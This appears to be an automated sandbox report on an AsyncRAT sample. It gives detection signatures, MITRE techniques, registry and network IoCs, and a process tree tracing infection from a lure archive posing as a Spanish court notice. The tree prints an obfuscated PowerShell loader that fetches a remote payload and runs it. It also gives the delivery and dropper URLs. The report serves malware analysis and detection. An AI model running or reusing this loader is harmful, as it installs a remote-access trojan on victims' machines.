asyncrat | hxxps://drive[.]google[.]com/uc?export=download&id=1p-IRRgVH9DT_3FYZY2qLY8ECFcSBruVq

Analysis

max time kernel
418s
max time network
420s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25-09-2024 22:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/uc?export=download&id=1p-IRRgVH9DT_3FYZY2qLY8ECFcSBruVq

Score

10^/10

asyncrat discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/V9y5Q5vv

exe.dropper

https://pastebin.com/raw/V9y5Q5vv

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 24 IoCs

flow	pid	Process
70	3600	powershell.exe
72	3600	powershell.exe
74	3600	powershell.exe
79	3600	powershell.exe
83	620	powershell.exe
84	620	powershell.exe
86	620	powershell.exe
88	620	powershell.exe
91	2044	powershell.exe
92	2044	powershell.exe
94	2044	powershell.exe
95	2044	powershell.exe
98	5036	powershell.exe
99	5036	powershell.exe
101	5036	powershell.exe
103	5036	powershell.exe
104	4660	powershell.exe
105	4660	powershell.exe
107	4660	powershell.exe
108	4660	powershell.exe
109	3576	powershell.exe
110	3576	powershell.exe
113	3576	powershell.exe
114	3576	powershell.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3600	powershell.exe
4228	powershell.exe
2044	powershell.exe
4440	powershell.exe
920	powershell.exe
3576	powershell.exe
4800	powershell.exe
620	powershell.exe
5036	powershell.exe
4660	powershell.exe
3220	powershell.exe
3080	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs

Web Service

T1102

flow	ioc
70	pastebin.com
92	bitbucket.org
99	bitbucket.org
104	pastebin.com
69	pastebin.com
72	bitbucket.org
105	bitbucket.org
109	pastebin.com
4	drive.google.com
71	bitbucket.org
84	bitbucket.org
98	pastebin.com
10	drive.google.com
83	pastebin.com
91	pastebin.com
110	bitbucket.org

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3600 set thread context of 4752	3600	powershell.exe	120
PID 620 set thread context of 3644	620	powershell.exe	125
PID 2044 set thread context of 4784	2044	powershell.exe	130
PID 5036 set thread context of 4496	5036	powershell.exe	139
PID 4660 set thread context of 3156	4660	powershell.exe	144
PID 3576 set thread context of 3604	3576	powershell.exe	145

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
3592	msedge.exe
3592	msedge.exe
1112	msedge.exe
1112	msedge.exe
2688	identity_helper.exe
2688	identity_helper.exe
544	msedge.exe
544	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4800	powershell.exe
4800	powershell.exe
3600	powershell.exe
3600	powershell.exe
3080	powershell.exe
3080	powershell.exe
620	powershell.exe
620	powershell.exe
4228	powershell.exe
4228	powershell.exe
2044	powershell.exe
2044	powershell.exe
4440	powershell.exe
4440	powershell.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
920	powershell.exe
920	powershell.exe
920	powershell.exe
4660	powershell.exe
4660	powershell.exe
4660	powershell.exe
3220	powershell.exe
3220	powershell.exe
3220	powershell.exe
3576	powershell.exe
3576	powershell.exe
3576	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeRestorePrivilege	4916	7zG.exe
Token: 35	4916	7zG.exe
Token: SeSecurityPrivilege	4916	7zG.exe
Token: SeSecurityPrivilege	4916	7zG.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeDebugPrivilege	3576	powershell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
4916	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe
1112	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1112 wrote to memory of 3596	1112	msedge.exe	82
PID 1112 wrote to memory of 3596	1112	msedge.exe	82
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3640	1112	msedge.exe	83
PID 1112 wrote to memory of 3592	1112	msedge.exe	84
PID 1112 wrote to memory of 3592	1112	msedge.exe	84
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85
PID 1112 wrote to memory of 5068	1112	msedge.exe	85

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/uc?export=download&id=1p-IRRgVH9DT_3FYZY2qLY8ECFcSBruVq
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff889ca46f8,0x7ff889ca4708,0x7ff889ca4718
  2⤵
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:3640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:8
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
  2⤵
  PID:2468
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  PID:1052
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
  2⤵
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:2944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3680 /prefetch:8
  2⤵
  PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,3295258960141445852,8674574044901302530,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2976 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4796

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1876

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3172

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\" -spe -an -ai#7zMap3052:288:7zEvent18505
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4916

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs"
1⤵
- Checks computer location settings
PID:3112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bp☆G0☆e☆B5☆Hk☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆HE☆ZgBk☆G8☆eg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBW☆Dk☆eQ☆1☆FE☆NQB2☆HY☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆egBj☆GQ☆cgB6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆egBj☆GQ☆cgB6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆x☆GE☆Mg☆5☆GQ☆OQ☆3☆GI☆NgBm☆Dg☆NQ☆t☆GY☆ZQ☆x☆Dk☆LQBm☆Dc☆Ng☆0☆C0☆Yw☆3☆GM☆Nw☆t☆Dc☆N☆Bi☆GI☆Zg☆1☆DE☆M☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆LgBh☆Gk☆c☆Bv☆EM☆M☆☆y☆CU☆bwB2☆Gk☆a☆Bj☆HI☆QQ☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆Lg☆0☆D☆☆M☆Bk☆GE☆LQBv☆HY☆ZQB1☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bx☆GY☆Z☆Bv☆Ho☆I☆☆s☆C☆☆JwBD☆G8☆bwBr☆Gk☆ZQBX☆Gk☆bg☆z☆DI☆LgBl☆Hg☆ZQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆LQ☆t☆C0☆LQ☆t☆C0☆LQ☆n☆Cw☆I☆☆k☆Gk☆bQB4☆Hk☆eQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs');powershell $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
